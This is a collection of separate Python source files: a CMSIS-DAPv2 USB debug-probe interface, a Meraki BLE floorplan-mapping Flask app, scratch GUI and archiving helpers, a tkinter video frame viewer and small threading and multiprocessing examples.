return self.ep_swo is not None
def open(self):
assert self.closed is True
# Get device handle
dev = usb.core.find(custom_match=HasCmsisDapv2Interface(self.serial_number))
if dev is None:
raise DAPAccessIntf.DeviceError("Device %s not found" %
self.serial_number)
# get active config
config = dev.get_active_configuration()
# Get CMSIS-DAPv2 interface
interface = usb.util.find_descriptor(config, custom_match=_match_cmsis_dap_interface)
if interface is None:
raise DAPAccessIntf.DeviceError("Device %s has no CMSIS-DAPv2 interface" %
self.serial_number)
interface_number = interface.bInterfaceNumber
# Find endpoints. CMSIS-DAPv2 endpoints are in a fixed order.
try:
ep_out = interface.endpoints()[0]
ep_in = interface.endpoints()[1]
ep_swo = interface.endpoints()[2] if len(interface.endpoints()) > 2 else None
except IndexError:
raise DAPAccessIntf.DeviceError("CMSIS-DAPv2 device %s is missing endpoints" %
self.serial_number)
# Explicitly claim the interface
try:
usb.util.claim_interface(dev, interface_number)
except usb.core.USBError as exc:
raise six.raise_from(DAPAccessIntf.DeviceError("Unable to open device"), exc)
# Update all class variables if we made it here
self.ep_out = ep_out
self.ep_in = ep_in
self.ep_swo = ep_swo
self.dev = dev
self.intf_number = interface_number
# Start RX thread as the last step
self.closed = False
self.start_rx()
def start_rx(self):
# Flush the RX buffers by reading until timeout exception
try:
while True:
self.ep_in.read(self.ep_in.wMaxPacketSize, 1)
except usb.core.USBError:
# USB timeout expected
pass
# Start RX thread
self.rx_stop_event = threading.Event()
thread_name = "CMSIS-DAP receive (%s)" % self.serial_number
self.thread = threading.Thread(target=self.rx_task, name=thread_name)
self.thread.daemon = True
self.thread.start()
def start_swo(self):
self.swo_stop_event = threading.Event()
thread_name = "SWO receive (%s)" % self.serial_number
self.swo_thread = threading.Thread(target=self.swo_rx_task, name=thread_name)
self.swo_thread.daemon = True
self.swo_thread.start()
self.is_swo_running = True
def stop_swo(self):
self.swo_stop_event.set()
self.swo_thread.join()
self.swo_thread = None
self.swo_stop_event = None
self.is_swo_running = False
def rx_task(self):
try:
while not self.rx_stop_event.is_set():
self.read_sem.acquire()
if not self.rx_stop_event.is_set():
self.rcv_data.append(self.ep_in.read(self.ep_in.wMaxPacketSize, 10 * 1000))
finally:
# Set last element of rcv_data to None on exit
self.rcv_data.append(None)
def swo_rx_task(self):
try:
while not self.swo_stop_event.is_set():
try:
self.swo_data.append(self.ep_swo.read(self.ep_swo.wMaxPacketSize, 10 * 1000))
except usb.core.USBError:
pass
finally:
# Set last element of swo_data to None on exit
self.swo_data.append(None)
@staticmethod
def get_all_connected_interfaces():
"""! @brief Returns all the connected devices with a CMSIS-DAPv2 interface."""
# find all cmsis-dap devices
try:
all_devices = usb.core.find(find_all=True, custom_match=HasCmsisDapv2Interface())
except usb.core.NoBackendError:
common.show_no_libusb_warning()
return []
# iterate on all devices found
boards = []
for board in all_devices:
new_board = PyUSBv2()
new_board.vid = board.idVendor
new_board.pid = board.idProduct
new_board.product_name = board.product
new_board.vendor_name = board.manufacturer
new_board.serial_number = board.serial_number
boards.append(new_board)
return boards
def write(self, data):
"""! @brief Write data on the OUT endpoint."""
report_size = self.packet_size
if self.ep_out:
report_size = self.ep_out.wMaxPacketSize
for _ in range(report_size - len(data)):
data.append(0)
self.read_sem.release()
self.ep_out.write(data)
#logging.debug('sent: %s', data)
def read(self):
"""! @brief Read data on the IN endpoint."""
while len(self.rcv_data) == 0:
sleep(0)
if self.rcv_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s read thread exited unexpectedly" % self.serial_number)
return self.rcv_data.pop(0)
def read_swo(self):
# Accumulate all available SWO data.
data = bytearray()
while len(self.swo_data):
if self.swo_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s SWO thread exited unexpectedly" % self.serial_number)
data += self.swo_data.pop(0)
return data
def set_packet_count(self, count):
# No interface level restrictions on count
self.packet_count = count
def set_packet_size(self, size):
self.packet_size = size
def get_serial_number(self):
return self.serial_number
def close(self):
"""! @brief Close the USB interface."""
assert self.closed is False
if self.is_swo_running:
self.stop_swo()
self.closed = True
self.rx_stop_event.set()
self.read_sem.release()
self.thread.join()
assert self.rcv_data[-1] is None
self.rcv_data = []
self.swo_data = []
usb.util.release_interface(self.dev, self.intf_number)
usb.util.dispose_resources(self.dev)
self.ep_out = None
self.ep_in = None
self.ep_swo = None
self.dev = None
self.intf_number = None
self.thread = None
def _check_ep(interface, ep_index, ep_dir, ep_type):
"""! @brief Tests an endpoint type and direction."""
ep = interface[ep_index]
return (usb.util.endpoint_direction(ep.bEndpointAddress) == ep_dir) \
and (usb.util.endpoint_type(ep.bmAttributes) == ep_type)
def _match_cmsis_dap_interface(interface):
"""! @brief Returns true for a CMSIS-DAP v2 interface.
This match function performs several tests on the provided USB interface descriptor, to
determine whether it is a CMSIS-DAPv2 interface. These requirements must be met by the
interface:
1. Have an interface name string containing "CMSIS-DAP".
2. bInterfaceClass must be 0xff.
3. bInterfaceSubClass must be 0.
4. Must have bulk out and bulk in endpoints, with an optional extra bulk in endpoint, in
that order.
"""
try:
interface_name = usb.util.get_string(interface.device, interface.iInterface)
# This tells us whether the interface is CMSIS-DAP, but not whether it's v1 or v2.
if (interface_name is None) or ("CMSIS-DAP" not in interface_name):
return False
# Now check the interface class to distinguish v1 from v2.
if (interface.bInterfaceClass != USB_CLASS_VENDOR_SPECIFIC) \
or (interface.bInterfaceSubClass != 0):
return False
# Must have either 2 or 3 endpoints.
if interface.bNumEndpoints not in (2, 3):
return False
# Endpoint 0 must be bulk out.
if not _check_ep(interface, 0, usb.util.ENDPOINT_OUT, usb.util.ENDPOINT_TYPE_BULK):
return False
# Endpoint 1 must be bulk in.
if not _check_ep(interface, 1, usb.util.ENDPOINT_IN, usb.util.ENDPOINT_TYPE_BULK):
return False
# Endpoint 2 is optional. If present it must be bulk in.
if (interface.bNumEndpoints == 3) \
and not _check_ep(interface, 2, usb.util.ENDPOINT_IN, usb.util.ENDPOINT_TYPE_BULK):
return False
# All checks passed, this is a CMSIS-DAPv2 interface!
return True
except (UnicodeDecodeError, IndexError):
# UnicodeDecodeError exception can be raised if the device has a corrupted interface name.
# Certain versions of STLinkV2 are known to have this problem. If we can't read the
# interface name, there's no way to tell if it's a CMSIS-DAPv2 interface.
#
# IndexError can be raised if an endpoint is missing.
return False
class HasCmsisDapv2Interface(object):
"""! @brief CMSIS-DAPv2 match class to be used with usb.core.find"""
def __init__(self, serial=None):
"""! @brief Create a new FindDap object with an optional serial number"""
self._serial = serial
def __call__(self, dev):
"""! @brief Return True if this is a CMSIS-DAPv2 device, False otherwise"""
# Check if the device class is a valid one for CMSIS-DAP.
if filter_device_by_class(dev.idVendor, dev.idProduct, dev.bDeviceClass):
return False
try:
config = dev.get_active_configuration()
cmsis_dap_interface = usb.util.find_descriptor(config, custom_match=_match_cmsis_dap_interface)
except usb.core.USBError as error:
# Produce a more helpful error message if we get a permissions error on Linux.
if error.errno == errno.EACCES and platform.system() == "Linux" \
and common.should_show_libusb_device_error((dev.idVendor, dev.idProduct)):
msg = ("%s while trying to interrogate a USB device "
"(VID=%04x PID=%04x). This can probably be remedied with a udev rule. "
"See <https://github.com/mbedmicro/pyOCD/tree/master/udev> for help." %
(error, dev.idVendor, dev.idProduct))
# If we recognize this device as one that should be CMSIS-DAP, we can raise
# the level of the log message since it's almost certainly a permissions issue.
if is_known_cmsis_dap_vid_pid(dev.idVendor, dev.idProduct):
LOG.warning(msg)
else:
LOG.debug(msg)
return False
except (IndexError, NotImplementedError, ValueError) as error:
return False
if cmsis_dap_interface is None:
return False
if self._serial is not None:
if self._serial != dev.serial_number:
return False
return True
|
app.py
|
""" Copyright (c) 2022 Cisco and/or its affiliates.
This software is licensed to you under the terms of the Cisco Sample
Code License, Version 1.1 (the "License"). You may obtain a copy of the
License at
https://developer.cisco.com/docs/licenses
All use of the material herein must be in accordance with the terms of
the License. All rights not expressly granted by the License are
reserved. Unless required by applicable law or agreed to separately in
writing, software distributed under the License is distributed on an "AS
IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
or implied.
"""
import datetime
import json
import logging
import os
import threading
from datetime import datetime
from time import sleep
import meraki
import requests
from dotenv import load_dotenv
from flask import Flask, Response, redirect, render_template, request, url_for
from PIL import Image, ImageDraw, ImageFont
log = logging.getLogger(__name__)
logging.basicConfig(level=os.environ.get("LOGLEVEL", "INFO"))
# REQUIRED CONFIG VALUES:
MERAKI_VALIDATION_KEY = ""
MERAKI_LOCATION_DATA_SECRET = ""
# OPTIONAL CONFIG VALUES
FILTER_BLE_TAGS = False
# If FILTER_BLE_TAGS is True, then BLE_UUID_FILTER must be set
BLE_UUID_FILTER = ""
SUPPRESS_MERAKI_LOGGING = True
FONT_SIZE = 10
# Load all environment variables
load_dotenv()
app = Flask(__name__)
dashboard = meraki.DashboardAPI(suppress_logging=SUPPRESS_MERAKI_LOGGING)
# Global variables
meraki_networks = {}
network_floorplans = {}
last_meraki_update = "Never"
# Index Page with links to each Meraki Network
@app.route("/", methods=["GET"])
def index():
return render_template(
"index.html",
hiddenLinks=False,
networks=meraki_networks,
last_update=last_meraki_update,
)
# Display Network Map for specified Meraki network ID
@app.route("/<network_id>", methods=["GET"])
def floorplan(network_id):
floorplan_list = network_floorplans[network_id]
return render_template(
"floorplan.html",
hiddenLinks=False,
networks=meraki_networks,
floorplans=floorplan_list,
)
# Meraki Scanning API Listener
@app.route("/location_info", methods=["GET", "POST"])
def location_info():
global last_meraki_update
# Meraki Dashboard will send location payloads via POST request
if request.method == "POST":
# Store Location JSON payload
location_data = request.json
print(location_data)
try:
# Validate that API Secret configured in Meraki Dashboard
# matches what is being sent to us.
if location_data["secret"] == MERAKI_LOCATION_DATA_SECRET:
# This application was written for version 3.x of the Meraki Scanning API
# schema, and will not work with prior versions
if not "3" in location_data["version"]:
log.error("Please set API Version to 3.0 in Meraki Dashboard")
return Response(
'{"error": "API version not 3.x"}',
status=400,
mimetype="application/json",
)
# Count number of unique BLE tags that were sent in the location payload
ble_count = len(location_data["data"]["observations"])
log.info(
f"Received location payload from Meraki Dashboard, containing {ble_count} BLE devices"
)
# Meraki Dashboard will track the responsiveness of our Scanning API listener
# If responses take too long, Meraki may assume our listener is dead.
# So we'll spin off the map updating function to it's own thread &
# continue on to respond quickly to the POST from Meraki with a 202
thread = threading.Thread(
target=updateMaps, args=(location_data["data"],)
)
thread.start()
# Update 'Last Updated' on main page
last_meraki_update = datetime.now().strftime(f"%a %b %d %Y, %I:%M%p")
return Response(status=202)
else:
# If API Secret does not match, return 401 & error message
log.warning("Received bad payload secret from Meraki Dashboard")
return Response(
'{"error": "Incorrect payload secret"}',
status=401,
mimetype="application/json",
)
except TypeError:
# If we're not able to parse the data payload, return a 400 error
return Response(
'{"error": "Wrong data format"}',
status=400,
mimetype="application/json",
)
else:
# On first creation of Scanning API POST target, Meraki Cloud will send a GET
# to validate the correct destination. We must reply with the validation key
# that Meraki Dashboard provides
log.info("Got validation request from Meraki Dashboard.")
return MERAKI_VALIDATION_KEY
# Pre-launch setup
@app.before_first_request
def setup():
"""
Prep local data prior to spinning up flask web UI
"""
log.warning("Performing initial setup. Web UI may not be available yet...")
# Pull down list of Meraki networks & store to build web UI links
getMerakiNetworks()
# Pull down original copies of floor plans for each network
downloadFloorPlans()
log.warning("Setup Complete! Starting Web UI...")
def updateMaps(ble_data):
"""
This function takes in a data payload from Meraki Dashboard, which
contains JSON list of BLE tags, location info, and AP/floorplan info
In this function, we will open each network floorplan image, then
update the image with text/icons to show where each AP/BLE tag
is located. Afterwards, the modified image is saved & sent to the web UI
"""
# Pull in globals, which contain our dict of Meraki networks & floorplans
global network_floorplans
# Since some BLE tags may not have accurate location info, we can still
# place tags next to nearest AP. So we will store the location info for
# each AP on the map
ap_locations = {}
log.info("Beginning map update...")
font = ImageFont.truetype("./static/fonts/Roboto-Regular.ttf", FONT_SIZE)
# Each network ID may contain multiple floormaps, so here we will iterate
# through each floormap for a given network ID
for map in network_floorplans[ble_data["networkId"]]:
log.info(f"Updating {map}")
# Pull current file name from our floorplan dictionary
filename = f"{network_floorplans[ble_data['networkId']][map]['filename']}"
# We will always copy the original, unmodified image to edit.
# If not, we would be overwriting on top of an already modified image.
# Modified images start with "ble-", so we can easily strip that here to
# get the original image name
source_image = f"./static/floorplans/{filename.split('ble-')[-1]}"
# Open image file for editing
with Image.open(source_image) as floorplan:
# Due to the way Meraki handles x,y coordinates (explained below),
# We need to pull out the image resolution & floorplan dimensions
image_w, image_h = floorplan.size
floorplan_w = network_floorplans[ble_data["networkId"]][map]["width"]
floorplan_h = network_floorplans[ble_data["networkId"]][map]["height"]
floorplan = floorplan.convert("RGB")
draw = ImageDraw.Draw(floorplan)
# Add APs to map - this will be any AP that has reported a BLE location
for ap in ble_data["reportingAps"]:
# Store MAC for if we need to tie a BLE tag to it's nearest AP later
ap_locations[ap["mac"]] = {}
# Reporting APs will list ALL APs in the network, so filter out which
# are not located on the floor we are working on right now
if ap["floorPlan"]["name"] == map:
# Meraki location data x,y values are in meters, but image
# is in pixel resolution.
# So we divide AP location (meters) by floorplan width/height (meters)
# and apply that ratio to image resolution height/width
# to get a rough estimate of where the AP is placed on the map
width_ratio = ap["floorPlan"]["x"] / floorplan_w
height_ratio = ap["floorPlan"]["y"] / floorplan_h
ap_x = image_w * width_ratio
ap_y = image_h * height_ratio
# Store AP x,y for any BLE tags that only report nearest AP
ap_locations[ap["mac"]]["x"] = ap_x
ap_locations[ap["mac"]]["y"] = ap_y
log.info(f"Adding APs to {map}")
# We will draw a small square at the exact coordinates, with AP name
# written next to it
draw.rectangle((ap_x, ap_y, ap_x + 5, ap_y + 5), fill=(35, 58, 235))
draw.text(
(ap_x + 7, ap_y), str(ap["name"]), (35, 58, 235), font=font
)
# Add BLE tags to map
# last_offset stores where the last text was placed.
# So by default, we would move the text 12px underneath
# the AP name so they don't overlap. Then continue
# incrementing by 12 for each additional device near that AP
last_offset = 12
for device in ble_data["observations"]:
try:
# Not all BLE tag types will advertise a UUID
# But if the tag does then we will store it to display
device_uuid = device["bleBeacons"][0]["uuid"]
except KeyError:
device_uuid = ""
except IndexError:
device_uuid = ""
try:
bleType = device['bleBeacons'][0]['bleType']
except IndexError:
bleType = "Unknown"
# We can optionally filter out tags that don't match a certain UUID
# So if filtering is enabled, we will check that here
if FILTER_BLE_TAGS == True and not BLE_UUID_FILTER in device_uuid:
log.info("Skipping tag due to UUID filter.")
continue
# Construct text label to be displayed on map image
ble_label = f"{device['name']} - {bleType}\n{device_uuid}"
if len(device["locations"]) > 0:
# If devices cannot be triangulated, no location info is provided
# With Meraki API v3, accurate location info is only provided if the
# tag is heard by 3 or more APs.
# Otherwise, we will only be told the single nearest AP
if device["locations"][0]["floorPlan"]["name"] == map:
ble_color = (212, 134, 44)
width_ratio = (
device["locations"][0]["floorPlan"]["x"] / floorplan_w
)
height_ratio = (
device["locations"][0]["floorPlan"]["y"] / floorplan_h
)
ble_x = image_w * width_ratio
ble_y = image_h * height_ratio
else:
# If no exact location info, place device near closest AP
try:
# This will only work if the BLE beacon is near an AP on the current floor map
# being edited.
# We have no way of knowing which map the BLE device is on - since that info is
# only provided if accurate location info is known.
ble_color = (35, 179, 30)
ble_x = (
ap_locations[device["latestRecord"]["nearestApMac"]]["x"]
+ 5
)
ble_y = (
ap_locations[device["latestRecord"]["nearestApMac"]]["y"]
+ last_offset
)
last_offset += 12
except KeyError:
# If we have no x,y then just continue to next device. This may occur if
# tag does not have any precise location info (we don't know which map it's on)
# but it's also not near any AP on this map
continue
log.info(
f"Adding BLE Device to map: {ble_label} at {ble_x}, {ble_y}"
)
try:
# Similar to AP, draw small square at precise location detected (or by nearest AP)
# then add label to the right of the square
draw.rectangle((ble_x, ble_y, ble_x + 5, ble_y + 5), fill=ble_color)
draw.text((ble_x + 7, ble_y), ble_label, ble_color, font=font)
except UnboundLocalError:
# BLE device can only be tied to a map if it contains precise location info
# If it doesn't, we use nearest AP MAC.
# However, we could be editing a map that doesn't match any of the info
# for the device we are trying to place - and therefore the ble_x / ble_y
# will never be set. So we catch that here & continue to next device
continue
# Update floorplan dictionary - which will adjust which image gets displayed in web UI
# If there is already a modified image (one starting with "ble-" prefix), then we
# will just overwrite & replace it here.
# Otherwise, use the new prefix for the filename & update our map dictionary
if not "ble" in filename:
destination_image = f"./static/floorplans/ble-{filename}"
network_floorplans[ble_data["networkId"]][map][
"filename"
] = f"ble-{filename}"
else:
destination_image = f"./static/floorplans/{filename}"
# Save the edited image
floorplan.save(destination_image)
# Finally, update the last updated time for all the map images
now = datetime.now().strftime(f"%a %b %d %Y, %I:%M%p")
network_floorplans[ble_data["networkId"]][map]["lastupdate"] = now
def getMerakiNetworks():
"""
This function will just query the Meraki dashboard for all networks
and store each network ID & name in a global variable
"""
global meraki_networks
log.info("Querying list of all Meraki Networks....")
# Query list of organizations
org = dashboard.organizations.getOrganizations()
# Query all networks under the first organization we have access to
networks = dashboard.organizations.getOrganizationNetworks(org[0]["id"])
# Build dictionary of Meraki network ID & name
meraki_networks = {network["id"]: network["name"] for network in networks}
log.info(f"Found {len(meraki_networks.keys())} networks!")
def downloadFloorPlans():
"""
Function to download all Meraki floorplan images for each network in
the organization.
All files will be stored to the web-accessible directory:
./static/floorplans/
"""
global network_floorplans
log.info("Querying & downloading floorplans...")
# Iterate through each Meraki network to download floorplans
for network in meraki_networks:
# We will create a dictionary for each network ID
# that will contain info we need about that floorplan
network_floorplans[network] = {}
# Retrieve floorplan info
floorplans = dashboard.networks.getNetworkFloorPlans(network)
for floorplan in floorplans:
network_name = meraki_networks[network]
floorplan_url = floorplan["imageUrl"]
floorplan_name = floorplan["name"]
img_ext = floorplan["imageExtension"]
height = floorplan["height"]
width = floorplan["width"]
# Build image name for when it is stored locallyt
download_name = f"{network_name} - {floorplan_name}.{img_ext}"
# Download image file
image_file = requests.get(floorplan_url)
# Write image to floorplan web directory
with open(f"./static/floorplans/{download_name}", "wb") as img:
img.write(image_file.content)
# Assemble dictionary of necessary attributes we will need later
network_floorplans[network][floorplan_name] = {}
network_floorplans[network][floorplan_name]["filename"] = download_name
network_floorplans[network][floorplan_name]["height"] = height
network_floorplans[network][floorplan_name]["width"] = width
network_floorplans[network][floorplan_name]["lastupdate"] = "Never"
log.info("Floorplans downloaded!")
if __name__ == "__main__":
app.run(debug=True)
|
scratch.py
|
from PIL import Image
#THis was more about making the directory path and not building the plausible path
def get_destination_path(self):
while not self.cached_destination_path:
# sort out which root directory to use when searching for result
project_root_dir_prefix, project_num_prefix = ArchiverHelpers.prefixes_from_project_number(self.project_number)
root_directories_list = os.listdir(RECORDS_SERVER_LOCATION)
matching_root_dirs = [dir_name for dir_name in root_directories_list if
dir_name.lower().startswith(project_root_dir_prefix)]
# if we have more than one matching root dir we throw an error
if len(matching_root_dirs) != 1:
logging.exception(
f"{len(matching_root_dirs)} matching directories in {RECORDS_SERVER_LOCATION} for {self.project_number}",
exc_info=True)
return
new_path = os.path.join(RECORDS_SERVER_LOCATION, matching_root_dirs[0])
# her we look for the directory that would contain the project directory
for root, dirs, files in os.walk(new_path):
if project_num_prefix in dirs:
new_path = os.path.join(root, project_num_prefix)
break
# if the project_num_prefix directory doesn't exist
if not project_num_prefix in ArchiverHelpers.split_path(new_path):
new_path = os.path.join(new_path, project_num_prefix)
def test_assemble_destination_path():
project = '2700'
desired_destination = DIRECTORY_CHOICES[8]
print(desired_destination)
new_filename = "2744.G19.Notice of Completion"
location = os.path.join(os.getcwd(), "file_to_archive")
file = ArchivalFile(current_location_path=location, project=project, new_filename= new_filename,
destination_dir=desired_destination)
dest_path = file.assemble_destination_path()
print(dest_path)
def test_gui():
window_test = GuiHandler()
# welcome_res = window_test.make_window("Welcome", window_test.welcome_layout())
dest_layout = window_test.destination_choice_layout(dir_choices=DIRECTORY_CHOICES, default_project_num="3238",
file_exists_to_archive=True)
dest_results = window_test.make_window("Choose a file destination.", dest_layout)
fail_reason = "Could not find necessary sub-directories to reconcile desired destination path."
window_test.make_window("Could not archive file in desired destination.",
window_layout=window_test.failed_destination_layout(fail_reason, str(os.getcwd())))
def get_destination_filename(self):
"""
returns the resulting anticipated filename from an anticipated archival process. Handles extensions by copying
them from current filename to desired new filename
:return:
"""
#subroutine check conents of the current location of the file for files that can be archived
is_archivable_file = lambda filename, dir_path: (os.path.isfile(os.path.join(dir_path, filename)) and (
len([ignore_file for ignore_file in FILENAMES_TO_IGNORE if ignore_file.lower() == filename.lower()]) == 0))
#we assume there is only one matching file
current_filename = [file for file in os.listdir(self.current_path) if
is_archivable_file(file, self.current_path)][0]
if not self.new_filename:
return current_filename
extension = current_filename.split(".")[-1]
destination_filename = self.new_filename
split_filename = self.new_filename.split(".")
if split_filename[-1] == extension:
return destination_filename
split_filename.append(extension)
destination_filename = ".".join(split_filename)
return destination_filename
def resize_image(path, new_path, dims = (32,32)):
foo = Image.open(path)
foo2 = foo.resize(dims, Image.ANTIALIAS)
foo2.save(new_path, quality=95)
return
# First effort to make a gui run while the program does research
def async_research(self):
async def find_similar_files(archivist, a_filename):
return archivist.researcher.similar_filename_paths(original_filename= filename, duration= 6,
similarity_threshold= 72, max_paths= 7)
async def find_similar_dirs(archivist, dest):
return archivist.researcher.randomized_destination_examples(
dest_dir=dest)
async def make_gui_waiting_window(gui_handler: GuiHandler):
gui_handler.make_window("Occupied", window_layout= [[sg.Text("Performing Research")]])
async def perform_research(archivist : Archivist, archivist_file):
filename = ArchiverHelpers.split_path(archivist.file_to_archive.current_path)[-1]
dest = archivist.file_to_archive.destination_dir
similar_files_task = asyncio.loop.create_task(find_similar_files(archivist=archivist,a_filename=filename))
similar_dirs_task = asyncio.loop.create_task(find_similar_dirs(archivist=archivist, dest=dest))
gui_task = asyncio.loop.create_task(archivist.gui)
#second effort at a loading window during research process
def loading_window(self, name, layout, function):
def function_thread(window: sg.Window, the_function = function):
results = function()
window.write_event_value('-THREAD DONE-', '')
return results
def function_threading():
threading.Thread(target=function_thread, args=(window, function,), daemon=True).start()
print("function threaded")
window = sg.Window(name, layout,)
while True:
event, values = window.read()
function_threading()
if event == '-THREAD DONE-':
print("thread complete.")
break
window.close()
#third effort at a loading screen gui
def loading_window_during_func(self, func):
sg.theme(self.gui_theme)
layout = [[sg.Text("Performing Function. Please wait...")]]
window = sg.Window(title="Loading Window", layout=layout, enable_close_attempted_event= True)
with concurrent.futures.ThreadPoolExecutor() as executor:
window_results = executor.submit(window.read)
func_results = executor.submit(func)
if func_results:
window.close()
# 4th effort at loading screen
def loading_window_during_func(self, func):
sg.theme(self.gui_theme)
layout = [[sg.Text("Performing Function. Please wait...")]]
window = sg.Window(title="Loading Window", layout=layout, enable_close_attempted_event= True)
def window_looks_for_func_end():
while True:
event, values = window.read()
if event in ('-THREAD DONE-', sg.WIN_CLOSED):
window.close()
return
def alert_window_when_function_complete(function):
func_results = function()
window.write_event_value('-THREAD DONE-', '')
return func_results
with concurrent.futures.ThreadPoolExecutor() as executor:
window_results = executor.submit(window_looks_for_func_end)
func_results = executor.submit(alert_window_when_function_complete, [func])
|
test.py
|
from udp_arduino_server import wait_for_connection, server_sock, info
from threading import Thread
udp_thread = Thread(target=wait_for_connection)
udp_thread.start()
while True:
cmd = raw_input()
if cmd == 'exit': break
print info
|
main.py
|
import tkinter as tk
import threading
import imageio
import sys
from termcolor import colored
from PIL import Image, ImageTk
from time import time, sleep
import os
import tempfile
import ffmpy
import shutil
import gc
###############################################################################
# 状态参数
###############################################################################
class Global():
def load(self, name):
videoName = name
fileExtension = os.path.splitext(videoName)[1].lower()
if fileExtension != '.mp4' and fileExtension != '.mpeg':
print(os.path.realpath(__file__))
tempDir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'tempfiles')
tempFile = os.path.join(tempDir, 'temp.mp4')
if os.path.exists(tempDir): shutil.rmtree(tempDir)
os.mkdir(tempDir)
ff = ffmpy.FFmpeg(
executable = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'ffmpeg.exe'),
inputs = { videoName : None },
outputs = { tempFile : '-f mp4' }
)
ff.run()
video = imageio.get_reader(tempFile)
else:
video = imageio.get_reader(videoName)
meta = video.get_meta_data()
print(meta)
self.video = video
self.name = name
self.pause = False
self.cur = 0
self.fps = meta.get('fps')
self.size = meta.get('source_size')
self.duration = meta.get('duration')
self.name = os.path.basename(videoName)
self.step = 1
self.speed = 1.0
self.count = video.count_frames()
self.zoom = 1.0
if self.size[0] * self.size[1] > self.windowSize()[0] * self.windowSize()[1]:
self.zoom = 2
self.jumpRecord = ""
self.frameTimeCost = 0
self.prepared = 0
curSize = (round(g.size[0] / g.zoom), round(g.size[1] / g.zoom))
self.photoImages = [None for i in range(self.count)]
# for i in range(self.count):
# self.photoImages.append(ImageTk.PhotoImage(g.frames(i).resize(curSize, Image.ANTIALIAS)))
gc.collect(generation = 2)
if self.count > 1000: print(colored('WARNING: video too large.', 'red'))
print('Read')
print(colored(g.name, 'green'))
print('fps', colored(g.fps, 'yellow'))
def frames(self, index):
return Image.fromarray(self.video.get_data(index))
def viewSize(self):
return (self.view.winfo_width(), self.view.winfo_height())
def windowSize(self):
return (self.tk.winfo_width(), self.tk.winfo_height())
def mousePos(self):
return (g.tk.winfo_pointerx() - root.winfo_rootx(), g.tk.winfo_pointery() - root.winfo_rooty())
def viewPos(self):
return (self.view.winfo_x() + self.viewSize()[0] // 2, self.view.winfo_y() + self.viewSize()[1] // 2)
def scaledSize(self):
return (max(1, round(self.size[0] / self.zoom)), max(1, round(self.size[1] / self.zoom)))
g = Global()
###############################################################################
###############################################################################
# 运行
###############################################################################
def updateTitle():
g.tk.title("[%03d / %03d] [%.0f%%] [step %d] [scale %.4f] %s | [time %.4f] | %s" % (
g.cur + 1, g.count,
g.prepared / g.count * 100,
g.step,
g.zoom,
g.name,
g.frameTimeCost,
g.jumpRecord
))
def correctSize():
if g.scaledSize() != (g.photoImages[g.cur].width(), g.photoImages[g.cur].height()):
g.photoImages[g.cur] = ImageTk.PhotoImage(g.frames(g.cur).resize(g.scaledSize(), Image.ANTIALIAS))
gc.collect(generation = 1)
g.prepared += 1
def prepare():
if g.photoImages[g.cur] is None:
g.photoImages[g.cur] = ImageTk.PhotoImage(g.frames(g.cur).resize(g.scaledSize(), Image.ANTIALIAS))
g.prepared += 1
def setFrame():
beginTime = time()
prepare()
correctSize()
imageObject = g.photoImages[g.cur] # tkinter 图像组件.
if g.viewSize() != (imageObject.width(), imageObject.height()):
g.view.config(image = imageObject) # 设置组件数据信息.
g.view.image = imageObject # 贴图片.
endTime = time()
g.frameTimeCost = endTime - beginTime
updateTitle()
return g.frameTimeCost
def nextFrame():
g.cur = g.cur + 1
if g.cur == g.count: g.cur = 0
setFrame()
def previousFrame():
g.cur = g.cur - 1
if g.cur < 0: g.cur = g.count - 1
setFrame()
def addStep():
g.step += 1
updateTitle()
def decStep():
g.step -= 1
if g.step == 0: g.step = 1
updateTitle()
def keyboardCallback(e):
# print(e)
if e.keysym.isdigit():
g.jumpRecord += e.keysym
updateTitle()
if e.keysym == 'Return' and g.jumpRecord != "":
jumpto = int(g.jumpRecord)
jumpto = min(g.count - 1, max(0, jumpto))
g.cur = jumpto
g.pause = True
g.jumpRecord = ""
setFrame()
if e.keysym == 'equal':
addStep()
if e.keysym == 'minus':
decStep()
if e.keysym == 'space':
g.pause = not g.pause
if e.keysym == 'Left' or e.keysym == 'a':
g.pause = True
for _ in range(g.step):
previousFrame()
if e.keysym == 'Right' or e.keysym == 'd' :
g.pause = True
for _ in range(g.step):
nextFrame()
if e.keysym == 'Up' or e.keysym == 'w':
g.pause = True
for _ in range(5 * g.step):
previousFrame()
if e.keysym == 'Down' or e.keysym == 's' :
g.pause = True
for _ in range(5 * g.step):
nextFrame()
if e.keysym == 'r':
g.zoom = 1
label.place(relx = 0.5, rely = 0.5, anchor = tk.CENTER)
def scrollCallback(e):
scale = e.delta // 120
rate = 0.9 ** scale
g.zoom *= rate
g.prepared = sum(map(lambda x: 1 if x is not None and g.scaledSize() == (x.width(), x.height()) else 0, g.photoImages))
updateTitle()
def stream(label: tk.Canvas):
g.load(sys.argv[1])
while True:
while g.pause : sleep(0.001)
nextFrame()
sleepTime = (1 / g.fps - g.frameTimeCost) / g.speed
if sleepTime > 0: sleep(sleepTime)
# else: print('Warning: fps not full. frame %d time %.4f' % (g.cur, g.frameTimeCost))
def clickCallback(e):
g.fromPoint = g.viewPos()
g.mouseFromPoint = g.mousePos()
def moveCallback(e):
g.mouseToPoint = g.mousePos()
dir = (g.mouseToPoint[0] - g.mouseFromPoint[0], g.mouseToPoint[1] - g.mouseFromPoint[1])
targetPos = (g.fromPoint[0] + dir[0], g.fromPoint[1] + dir[1])
g.view.place(relx = targetPos[0] / g.windowSize()[0], rely = targetPos[1] / g.windowSize()[1], anchor = tk.CENTER)
if __name__ == "__main__":
root = tk.Tk()
root.config(width = 1280, height = 800)
label = tk.Label(root)
label.place(relx = 0.5, rely = 0.5, anchor = tk.CENTER)
thread = threading.Thread(target = stream, args = (label,))
thread.daemon = 1
thread.start()
g.tk = root
g.view = label
root.bind('<Key>', keyboardCallback)
root.bind("<MouseWheel>", scrollCallback)
root.bind("<Button-1>", clickCallback)
root.bind("<B1-Motion>", moveCallback)
root.mainloop()
|
multiprocess.py
|
import random
import multiprocessing as mp
def random_integer(output):
"""Generate a random integer in [0, 9]
Args:
output: multiprocessing queue
"""
integer = random.randint(0, 9)
output.put(integer)
def main():
output = mp.Queue()
processes = []
for _ in range(4):
processes.append(
# Create a process that wraps our function
mp.Process(target=random_integer, args=(output,))
)
for proc in processes:
proc.start()
for proc in processes:
proc.join()
results = [output.get() for proc in processes]
print(results)
if __name__=="__main__":
main()
|
onedrive.py
|
from __future__ import print_function
from builtins import str
from builtins import object
